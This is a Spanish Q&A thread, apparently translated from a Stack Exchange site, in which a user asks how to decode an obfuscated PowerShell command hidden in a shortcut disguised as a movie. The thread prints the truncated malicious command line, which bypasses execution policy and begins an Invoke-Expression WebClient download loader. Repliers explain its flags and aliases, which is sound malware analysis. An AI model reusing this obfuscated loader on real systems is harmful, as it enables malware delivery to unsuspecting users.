Cómo decodificar el posible comando powershell de malware

0

Obtuve un archivo que debería haber sido una película pero resultó ser un atajo para ejecutar un comando de PowerShell. Los detalles son:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP  &( $verBOSEprefeREncE.TOstRING()[1,3]+'x'-joiN'')( ('73w69Y88!40%78%101Y119%45!79c98!106%101!99!116c32c83G121Y115w116v101!109c46w78w101%116u46v87c101Y98%67%108b105:101w110G116%.

¿Alguien puede aconsejarme qué haría este comando powershell o dónde puedo encontrar detalles sobre cómo decodificarlo?

Gracias

powershell malware kfbnlet
fuente
[1] corre powershell.exe /?para ver cuáles son los primeros tres -somethingelementos. [2] corre ( $verBOSEprefeREncE.TOstRING()[1,3]+'x'-joiN'')para ver qué es eso. Si no está familiarizado con los alias, ejecute Get-Aliascon la salida de eso. [3] el resto es probablemente el comienzo de un comando codificado en base64. NO está todo ahí, así que no hay forma de estar seguro de eso.
Lee_Dailey
No ejecute ninguna parte del comando si no está seguro de lo que está haciendo y cree que el comando es malicioso.
Root
El archivo (aunque tiene un tamaño de 750 MB y parece ser un archivo de película) es en realidad un acceso directo y la línea de comando anterior es el objetivo del acceso directo. Lo he comprobado y no hay nada más, así que si falta algo, de alguna manera debe estar en la carga útil.
kfbnlet
Comentario previo publicado prematuramente. Ejecuté Malwarebytes que identificó una instalación de instalación de troyanos en el momento en que ejecuté el acceso directo, por lo que era malware.
kfbnlet

Respuestas:

2

powershell.exe -NoPr -WINd 1 -eXEc ByP es powershell.exe -NoProfile -WindowStyle 1 -ExecutionPolicy bypass

El comando que intenta ejecutar $verBOSEprefeREncE.TOstRING()[1,3]+'x'-joiN''es en realidad iexun alias paraInvoke-Expression

Creo que te has perdido una parte de la línea de comando, por lo que es difícil saber qué significa el resto.

montonero
fuente